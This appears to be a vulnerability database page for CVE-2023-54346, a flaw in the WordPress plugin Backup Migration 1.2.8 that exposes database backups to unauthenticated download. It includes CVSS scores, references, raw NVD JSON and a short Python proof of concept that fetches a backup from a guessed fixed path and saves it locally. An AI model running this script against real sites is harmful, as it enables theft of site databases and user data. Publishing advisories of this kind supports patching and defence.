CVE-2023-54346

Description

WordPress Plugin Backup Migration 1.2.8 contains an information disclosure vulnerability that allows unauthenticated attackers to download complete database backups by accessing predictable file paths. Attackers can enumerate backup directories through configuration files and complete logs, then construct direct download URLs to retrieve sensitive backup archives containing full database dumps.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Backup Migration <= 1.2.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2023-54346 Proof of Concept
# This script attempts to download database backups from a vulnerable WordPress site.

def check_vulnerability(target_url):
    # Common predictable path for the vulnerable plugin
    # Attackers would need to enumerate the exact filename, often found in logs or config
    backup_url = f"{target_url}/wp-content/plugins/backup-backup/backups/backup_database.sql"
    
    print(f"[+] Checking target: {target_url}")
    print(f"[+] Attempting to download: {backup_url}")
    
    try:
        response = requests.get(backup_url, timeout=10)
        if response.status_code == 200:
            print("[!] SUCCESS: Backup file downloaded!")
            print(f"[!] File size: {len(response.content)} bytes")
            # Save the file
            with open("dumped_backup.sql", "wb") as f:
                f.write(response.content)
            print("[!] Saved as 'dumped_backup.sql'")
        else:
            print(f"[-] Failed. HTTP Status Code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 poc.py <http://target_url>")
    else:
        check_vulnerability(sys.argv[1])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-54346
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-54346
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-54346/
[4] VulDB https://vuldb.com/cve/CVE-2023-54346
[5] https://backupbliss.com/
[6] https://downloads.wordpress.org/plugin/backup-backup.1.2.8.zip
[7] https://www.exploit-db.com/exploits/51445
[8] https://www.vulncheck.com/advisories/wordpress-plugin-backup-migration-unauthenticated-database-backup-download

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-54346", "sourceIdentifier": "[email protected]", "published": "2026-05-05T12:16:17.020", "lastModified": "2026-05-05T19:47:57.367", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "WordPress Plugin Backup Migration 1.2.8 contains an information disclosure vulnerability that allows unauthenticated attackers to download complete database backups by accessing predictable file paths. Attackers can enumerate backup directories through configuration files and complete logs, then construct direct download URLs to retrieve sensitive backup archives containing full database dumps."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-538"}]}], "references": [{"url": "https://backupbliss.com/", "source": "[email protected]"}, {"url": "https://downloads.wordpress.org/plugin/backup-backup.1.2.8.zip", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/51445", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/wordpress-plugin-backup-migration-unauthenticated-database-backup-download", "source": "[email protected]"}]}}